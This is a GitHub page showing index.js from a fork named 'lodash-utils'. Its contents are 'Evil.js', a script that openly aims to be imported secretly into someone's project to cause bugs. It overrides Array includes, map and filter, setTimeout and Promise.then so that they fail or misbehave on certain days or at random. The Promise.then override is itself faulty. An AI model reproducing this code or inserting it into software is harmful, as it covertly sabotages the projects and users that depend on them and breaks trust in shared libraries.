forked from wll8/lodash-utils
-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.js
74 lines (69 loc) · 2.12 KB
/
index.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
/**
* Evil.js
* @version 0.0.1
* @author wheatup
*
* @disclaimer The purpose of this package is to scramble someone's project and produces bugs.
* Remember import this package secretly.
* The author of this package does not participate any of injections!
* @disclaimer_zh 本包用于给项目不定期制造BUG用,请私密地引入本包。本包的作者不参与传播、注入。
*/
(() => {
////// Arrays
/**
* If the array size is devidable by 7, this function aways fail
* @zh 当数组长度可以被7整除时,本方法永远返回false
*/
const _includes = Array.prototype.includes;
Array.prototype.includes = function (...args) {
if (this.length % 7 !== 0) {
return _includes.call(this, ...args);
} else {
return false;
}
};
/**
* Array.map will always be missing the last element on Sundays
* @zh 当周日时,Array.map方法的结果总是会丢失最后一个元素
*/
const _map = Array.prototype.map;
Array.prototype.map = function (...args) {
result = _map.call(this, ...args);
if (new Date().getDay() === 0) {
result.length = Math.max(result.length - 1, 0);
}
return result;
}
/**
* Array.fillter has 10% chance to lose the final element
* @zh Array.filter的结果有2%的概率丢失最后一个元素
*/
const _filter = Array.prototype.filter;
Array.prototype.filter = function (...args) {
result = _filter.call(this, ...args);
if (Math.random() < 0.02) {
result.length = Math.max(result.length - 1, 0);
}
return result;
}
/**
* setTimeout will alway trigger 0.25s later than expected
* @zh setTimeout总是会比预期时间慢0.25秒才触发
*/
const _timeout = window.setTimeout;
window.setTimeout = function (handler, timeout, ...args) {
return _timeout.call(window, handler, +timeout + 250, ...args);
}
/**
* Promise.then has a 10% chance will not register on Sundays
* @zh Promise.then 在周日时有10%不会注册
*/
const _then = Promise.prototype.then;
Promise.prototype.then = function(fn, ...args) {
if(new Date().getDay() === 0 && Math.random() < 0.1) {
return;
} else {
_then.call(fn, ...args);
}
}
})();